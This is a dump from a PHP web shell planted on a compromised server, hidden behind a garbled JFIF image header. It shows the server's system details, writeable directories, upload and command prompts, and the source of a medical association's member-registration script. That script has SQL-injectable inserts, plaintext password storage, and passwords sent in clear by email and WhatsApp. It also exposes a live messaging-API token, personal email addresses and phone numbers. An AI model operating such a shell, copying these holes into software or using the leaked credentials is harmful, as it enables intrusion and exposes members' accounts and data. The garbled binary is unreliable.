JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 191.101.228.128  /  Your IP : 216.73.216.163
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/member/multi6.php
	<?php 

	session_start();      

if($_SESSION["code"] != $_POST["kode"]){

    //jika code captcha salah mmaka akan kembali ke halaman sebelumnya

    echo "<script>alert('captcha yang anda masukkan salah...');window.history.go(-1);</script>";

}else{ ?>	



<!DOCTYPE html>

<html>

<head>



	<style type="text/css">

	dy{

	font-family: roboto;

}

 

h1{

	width: 650px;

}

 

table{

	border-collapse: collapse;

}

 

table th, table td{

	padding: 10px 20px;

}

</style>

</head>

<body>



	  

	<?php 

//include 'koneksi.php';

// include 'header.php';

include '../koneksi.php';



//$id = $_GET['id'];

//$npm = trim($_GET['npm']);

//$email = trim($_GET['email']);

//$nmlead = $_GET['nmlead'];



// filter data yang diinputkan

    $nmlead = filter_input(INPUT_POST, 'nama', FILTER_SANITIZE_STRING);

   // $username = filter_input(INPUT_POST, 'username', FILTER_SANITIZE_STRING);

     $email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);





$sql = "select * from mahasiswa where email='".$email."' limit 1";

$hasil = mysqli_query ($konek,$sql);

$pernah = mysqli_num_rows($hasil);


$dp = mysqli_fetch_array($hasil );
	
	$level=$dp['level'];


if ($pernah>0 and $level=='user') {
	

	

 echo "<script>alert('Email yang di input sudah digunakan Registrasi!,...');window.history.go(-1);</script>";

//echo "Email sudah digunakan Registrasi!";



//	$urutan--;

////$kodeid2= $huruf.$waktu."IDB".sprintf("%04s", $urutan);

//

//header("location:input_member?email= $email");

//

	

 }else{

	            $nmlead = filter_input(INPUT_POST, 'nama', FILTER_SANITIZE_STRING);

				$email = filter_input(INPUT_POST, 'email', FILTER_VALIDATE_EMAIL);

				//variabel untuk menampung inputan dari form

					//	$npm 	= $_POST['npm'];

					

					//	$nmlead 	= $_POST['nama'];

						$telp	= $_POST['telp'];

					//	$email  = $_POST['email'];

						$pass   = $_POST['password'];

						$pass_md5 = md5($pass);

						$project= 'Ikatan Dokter Indonesia';

					//	$file= $_POST['file'];

						$tgl 	= date('Y-m-d');

						//$logo= $_POST['logo'];

						$kode   = md5(uniqid(rand()));
	$anggota= $_POST['anggota'];


						



		//proses simpan

		

		               

				  $project ='Ikatan Dokter Indonesia';

				  $day = 'Green Cleosa';



				   $dayList = array(

					'Green Cleosa' => 'IDB',

					'AGD' => 'AGD',



					);





				// https://www.malasngoding.com

				// menghubungkan dengan koneksi database

				// mengambil data barang dengan kode paling besar



				$query = mysqli_query($konek, "SELECT max(substr(npm, -6, 6)) as kodeTerbesar FROM mahasiswa");

				$data = mysqli_fetch_array($query);

				$kodeBarang = $data['kodeTerbesar'];

				$urutan = (int) substr($kodeBarang, -6, 6);

				$urutan++;

				$huruf =  $dayList[$day];

				$waktu=date('dmy');

				$kodeid= $huruf.$waktu.sprintf("%06s", $urutan);



					//  	$simpan = mysqli_query($konek, "insert into mahasiswa (npm,project,nama_mhs,tgl_gabung,password,level,status,telp,email,active,kode,codeweb)

														//     values('$kodeid','$project','$nmlead','$tgl','$pass_md5','user','nonaktif','$telp','$email',1,'$kode','$namafile')");



				$tglBayar 	= date('Y-m-d');





				//$simpan = mysqli_query($konek, "insert into h_anggota (npm,nmlead,tgl_daf,password,level,status,telp,email,active,barcode)

															 //values('$kodeid','$nmlead','$tgl','$pass_md5','user','aktif','$telp','$email','2','NRP.png')");											







				 //Buat Barcode



				 // define('ROOT', 'http://iditestweb.my.id/IDI/');



					define('ROOT', 'https://idikotabandung.com/IDI/member/');



				//  ".ROOT."konfirmasi.php?email=".$email."&kode=".$kode."&npm=".$kodeid." ";



				   $web = ROOT."konfirmasi.php?npm=$kodeid&email=$email&kode=$kode" ;





						include "phpqrcode/qrlib.php"; 

						/*create folder*/

						$tempdir="code/";

						if (!file_exists($tempdir))

						mkdir($tempdir, 0755);

					//	$file_name=date("Ymd").rand().".png";	

						$namafile=date("Ymd").rand().".png";	

						$file_path = $tempdir.$namafile;

	

						$namafile2="suratno_008_idi.jpg";	

						$file_path2 = $tempdir.$namafile2;



						QRcode::png($web, $file_path, "H", 4, 4);

						/* param (1)qrcontent,(2)filename,(3)errorcorrectionlevel,(4)pixelwidth,(5)margin */

				?>



				<?php

				$pengirim = $_POST['nama'];

				$email  = $_POST['email'];

				//$npm    = $_POST['npm'];

				$username= $_POST['nama'];

				$nmlead= $_POST['nama'];



				//$hp = $_POST['hp'];

				//$komentar=$_POST['note'];

				$tgl=date("d-m-Y");

				$wkt=date("h:i:s");









				 //kirim email

				 // PHPmailer





					 require_once "class.phpmailer.php";



					$mail = new PHPMailer;

					 //(dari) email dan nama pengirim 

					$mail->From = "info@idikotabandung.com";

					 $mail->FromName = "Admin IDI Skertariat";



					 //(ke) email penerima 

					$mail->addAddress($email);



				   // $mail->addAttachment("idilogo.png");        

				//	$mail->addAttachment($file_path);

				

					//$surat="suratno_008_idi.jpg";

	

					//$mail->addAttachment($surat); 

					//$mail->addAttachment($file_path2);

	

	$mail->addAttachment("idi006.jpg");  

	

					$mail->isHTML(true);



				   $mail->AddEmbeddedImage($file_path, "my-attach", $namafile);

				  //   $mail->Body = 'Your <b>HTML</b> with an embedded Image: <img src="cid:my-attach"> Here is an image!';





					$mail->Subject = "Registrasi Member IDI Kota Bandung";

					$mail->Body = "



				Kepada Yth: Bapak/Ibu .$nmlead, <br>

				<br><br>

				Terimakasih atas partisipasinya untuk  melakukan registrasi ulang, <br>

				

				Berdasarkan Surat edaran No:006/S.E/IDI-Bd/XII/2021 (terlampir) <br>

				Perihal : Edaran Registrasi Ulang Keanggotaan (terlampir attach file) <br>

				Tentang Pemutahiran Data Anggota IDI Kota Bandung  secara Online : <br>

				Semua anggota IDI Kota Bandung diharaplkan partisipasinya untuk melakukan update data, <br>

			



				Teknis Registrasi sbb :<br>



				1. Click link Aktivasi OTP dibawah ini, atau copy pastekan di browser anda,<br>

				   untuk login otomatis ke System kami:<br>

				<br>

					".ROOT."konfirmasi.php?email=".$email."&kode=".$kode."&npm=".$kodeid."<br>

				<br><br>

				2. Cara kedua bisa dengan Cara scan Barcode dengan camera HP: <br>

				<br>

				Install aplikasi scan barcode di app strore untuk android, lalu arahkan camera ke barcode<br>

				<img src='cid:my-attach'> <br>

				<br><br>

				Informasi Login User dan pasword:<br>

				<br>

				User 		: $kodeid<br>

				password	: $pass<br>

				<br>

				<br>

				Setelah login :<br>

				- Update data Anda<br>

					<br>



				Untuk Informasi Hotline Anggota/Tamu <br>
khusus Registrasi ulang, Anggota Baru, Pengajuan rekom, Mutasi<br>
Hotline 1 : +62 813-2279-8252 <br>
Hotline 2 : +62 859-3918-9471 <br>



				";





				// //kirim email lokal



				 if(!$mail->send()){

				    echo "Email gagal dikirim: " . $mail->ErrorInfo;

				  }else{

				      echo "Email sukses dikirim";  





$simpan = mysqli_query($konek, "insert into mahasiswa (npm,project,nama_mhs,tgl_gabung,password,level,status,telp,email,active,kode,codeweb,anggota)

		values('$kodeid','$project','$nmlead','$tgl','$pass_md5','baru','aktif','$telp','$email',1,'$kode','$namafile','$anggota')");





		$simpan = mysqli_query($konek, "insert into h_anggota_reg (npm,nmlead,tgl_daf,password,level,status,telp,email,active,barcode,anggota)

							values('$kodeid','$nmlead','$tgl','$pass','baru','aktif','$telp','$email','2','NRP.png','$anggota')");		
 	IF($anggota=='1'){
   $simpan = mysqli_query($konek, "insert into h_anggota_temp (npm,nmlead,tgl_daf,telp,email,active,registrasi)

					 values('$kodeid','$nmlead','$tgl','$telp','$email','1','1')");	


//define('ROOT', 'http://idikotabandung.com/IDI/');

$web2 = ROOT."login.php?npm=$kodeid" ;

$web='https://idikotabandung.com/registrasi/image/idibdg.jpg';
$header = array(
    "Content-Type: application/json",
    "Authorization: fc23c81daee5fc01b43115aebd39e2f4"
);

$data = array(
    "device" => "6285939189471",
    "phone" => "$telp",
	"message" => "
	
	Kepada Yth: Bapak/Ibu $nmlead, 

	Terimakasih atas partisipasinya untuk  melakukan registrasi ulang,
	
	Informasi Login User dan pasword:
				User 	 : $kodeid
				password : $pass

	Silahkan login untuk Proses Update data :
$web2
",
    "url" =>  "$web"
);

$param_post = json_encode($data, JSON_PRETTY_PRINT);
$post        = curl_init("https://app.alatwa.com/api/send/message/media");
//$post        = curl_init("https://app.alatwa.com/api/send/message/text");
curl_setopt($post, CURLOPT_HTTPHEADER, $header);
curl_setopt($post, CURLOPT_POST, 1);
curl_setopt($post, CURLOPT_POSTFIELDS, $param_post);
curl_setopt($post, CURLOPT_RETURNTRANSFER, true);
curl_setopt($post, CURLOPT_CONNECTTIMEOUT, 0); 
curl_setopt($post, CURLOPT_TIMEOUT, 5);
$response = curl_exec($post);
curl_close($post);
echo $response;				

}




									 header("location:thanks.php?email=$email&npm=$kodeid&nmlead=$nmlead");							 

				}





				////kirim email





				$to = "ifi.kurnia@gmail.com";

				$to2 = "firmanherru@gmail.com";



				$subject = "New Registration From idikotabandung.com";

				$headers = "From: Pengirim Email<idikotabandung.com>";

				$isi = 



				"Data Baru Permohonan Registrasi Ulang IDI Cabang Bandung :



				Nama    	: $pengirim

				ID    		: $kodeid

				Pass            : $pass
				
				HP   		: $telp

				Email   	: $email";

				// $pesan  = "Klik link berikut untuk mengaktifkan akun: <br />";

				// $pesan  .= "<a href='".ROOT."konfirm.php?email=".$_POST['email']."&kode=$kode&username=".$_POST['username']."'>".ROOT."konfirm.php?email=".$_POST['email']."&kode=$kode</a>";

				// Komentar 	: $komentar";

				//mail($email,$subjek,$pesan,$header,$to,$subject,$isi,$headers);

				// eksekutor





				//mail di local di tandai biar ngak lambat

				mail($to,$subject,$isi,$headers);

				mail($to2,$subject,$isi,$headers);





				//header("location: newakun.php");



				?>









				<?php

				/* $nis = $_POST['nis'];

				$namasiswa = $_POST['namasiswa']; 

								if($nis == "" ){

								//header("location:tampil_siswa.php?view=tambah&nis=kosong");

								echo "<script> document.location.href='input_admin.php?view=tambah&nis=kosong'; </script>";

								}else if ($namasiswa == "" ){

							  //  header("location:tampil_siswa.php?view=tambah&namasiswa=kosong");

								echo "<script> document.location.href='input_admin.php?view=tambah&nis=kosong'; </script>";

								} 

								echo "Nis anda adalah". $nis;

								echo "Nama anda adalah". $namasiswa;



								$cek = mysqli_num_rows( mysqli_query($konek,"SELECT * FROM  mahasiswa WHERE npm='$nis'"));



								if($cek > 0){



								echo "<script> document.location.href='input_admin.php?view=tambah&hasil=gagal'; </script>";



								} */

				?>





				<?php } ?>



	

	

	

	

	

	

<?php	

} ?>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit